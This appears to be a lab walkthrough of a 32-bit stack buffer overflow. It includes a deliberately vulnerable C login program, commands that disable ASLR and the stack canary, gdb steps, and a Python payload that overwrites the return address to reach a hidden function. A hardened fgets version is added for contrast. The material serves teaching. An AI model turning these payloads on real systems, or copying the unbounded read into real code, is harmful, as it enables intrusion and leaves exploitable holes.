sudo apt update
sudo apt install build-essential
sudo apt-get install gcc-multilib
sudo apt install gdb
cat /proc/sys/kernel/randomize_va_space
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
ulimit -c
ulimit -c unlimited
ulimit -c
*This code will be used for this exploit:
- vulnerable.c
#include <stdio.h>
#include <string.h>

void user(){
    printf("Excellent Snake!\n");
    printf("You have infiltrated the facility!!!\n");
}

void login(){
    char password[16];
    printf("Enter your password\n");
    /* scanf("%s") has no length limit: input longer than the 16-byte buffer overflows it */
    scanf("%s", password);
    if(strcmp(password, "FoxHound")){
        printf("Mission Failed!\n");
    }
    else{
        user();
    }
}

int main()
{
    login();
    return 0;
}
gcc -o vulnerable vulnerable.c
gcc -o vulnerable -fno-stack-protector -m32 -z execstack vulnerable.c
-fno-stack-protector --> Removes the canary value at the end of the buffer
-m32 --> Sets the program to compile into a 32 bit program
-z execstack --> Makes the stack executable
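For contrast, here is a hardened version of the same login() (an added example, not part of the lab code): the only change is that the read is bounded with fgets, so an over-long line is truncated and drained instead of overwriting the saved return address. The login_from_string helper is a test convenience that feeds a constructed input through a temporary file.

```c
#include <stdio.h>
#include <string.h>

/* Read one line into buf without ever writing past buflen bytes: fgets is
   bounded, unlike the lab's scanf("%s"). Strips the newline; if the line was
   longer than the buffer, the unread tail is discarded so it is not picked up
   by the next read. Returns 1 if a line was read, 0 on EOF. */
int read_password(FILE *in, char *buf, size_t buflen) {
    if (buflen == 0 || fgets(buf, (int)buflen, in) == NULL)
        return 0;
    size_t n = strcspn(buf, "\n");
    if (buf[n] == '\n') {
        buf[n] = '\0';
    } else {                       /* over-long line: discard the rest */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return 1;
}

/* Hardened login(): same 16-byte buffer and same password check as the lab
   program, but a bounded read. Returns 1 when the password matches, 0 otherwise. */
int login_from(FILE *in) {
    char password[16];
    if (!read_password(in, password, sizeof password))
        return 0;
    if (strcmp(password, "FoxHound") == 0) {
        puts("Excellent Snake!");
        return 1;
    }
    puts("Mission Failed!");
    return 0;
}

/* Test helper: feeds a constructed input string through a temporary file. */
int login_from_string(const char *input) {
    FILE *f = tmpfile();
    if (f == NULL)
        return -1;
    fputs(input, f);
    rewind(f);
    int result = login_from(f);
    fclose(f);
    return result;
}

int main(void) {
    puts("Enter your password");
    return login_from(stdin) ? 0 : 1;
}
```

Compiled with the same flags as the lab, the 28-byte 'A' padding plus address from the later step no longer reaches the return address; the program simply prints "Mission Failed!" and exits.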
gdb ./vulnerable
-
Firstly disassemble main to know the function state of main in memory.
(gdb) disassemble main
-
Then disassemble login to know the function state of login in memory.
(gdb) disassemble login
-
Then disassemble user to know the function state of user in memory.
(gdb) disassemble user
run
AAAAAAAA
- This prints the incorrect-password message. The program behaves normally because the input does not exceed the buffer limit.
disassemble login
break *0x080484ba
break *0x080484e6
-
This creates two breakpoints in the login function; they will be used to debug the program.
-
To see information about the registers, i.e. the memory addresses held in $esp and $eip, enter the following command:
info registers
run
AAAAAAAA
x/20x $esp
c
- This exits normally without any fault.
AAAAAAAAAAAAAAAAAAAAA
disassemble login
- then note the address of the user() function
(gdb) q or [ctrl+shift+z]
python2 -c "print('A'*28 + '\x8b\x84\x04\x08')" > input.txt
(Python 2 print writes the raw bytes; under Python 3, print would encode them as UTF-8 and the address would be wrong, so write them as bytes instead, e.g. with sys.stdout.buffer.write.)
run < input.txt
c
c
- You will see "Mission Failed!" but gain access to the user function.
That's all, unless the 64-bit machine has some issues with GDB.